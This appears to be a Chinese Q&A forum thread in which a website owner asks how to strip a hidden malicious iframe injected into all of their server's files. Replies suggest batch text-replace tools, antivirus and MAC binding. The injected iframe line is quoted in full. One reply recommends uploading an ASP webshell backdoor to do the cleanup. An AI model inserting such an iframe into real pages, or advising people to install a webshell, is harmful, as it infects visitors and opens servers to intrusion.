服务器上的网站所有能在文本文档中打开的文件都被插入了这行代码

来源:百度知道 编辑:UC知道 时间:2024/06/05 15:01:03
服务器上的网站所有能在文本文档中打开的文件都被插入了这行代码<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe> 我打开那个网站就中病毒了,而且它自己去下载木马,还有病毒,狂下,最后连桌面都看不到,重启进不了桌面,只有在安全模式才进的去。我想请教高手用什么办法可以去掉那些文件的那行代码?不要告诉我一个一个的删,那个网站光后台就有上百个asp文件。那些生成的html新闻就更别说,55555555555555谁救救我啊。
哪个高手赐教下怎么搞,在线等,200分不成敬意,请笑纳。先谢谢了
感谢各位的回答,可是最佳答案只有一个,非常抱歉。只能给一个人。投票来决定吧。

用UltraEdit,批量修改<iframe src="http://boc.sbb22.com/home/index.htm" width=20 height=0></iframe> 为空字符串,可选择任何扩展名和任何路径及子目录。

烈火的网站有下载:
http://www.hrtsea.com/down/soft/79.htm

呵呵 下载一个SuperTextReplace.

然后,把网站程序下载到本地。可以批量改。

以毒攻毒吧,你下个海洋或者火狐之类的ASP后门程序,放到上面,里面有清除的工具,这个工具是为了把以前别人挂的马给删掉挂自己的马的,你也可以用这个功能试试

被挂网马了...楼上的说什么呢,看了半天我看不明白

.BAK是备份出来的文件

这个是在机房的交换机上,对http包进行修改了,本机的文件并没有加病毒的url,只要进行双向的静态mac绑定就可以了。

1.杀毒
2.重新安装系统

中毒,当然杀毒,去查一下他的专杀,应该有针对的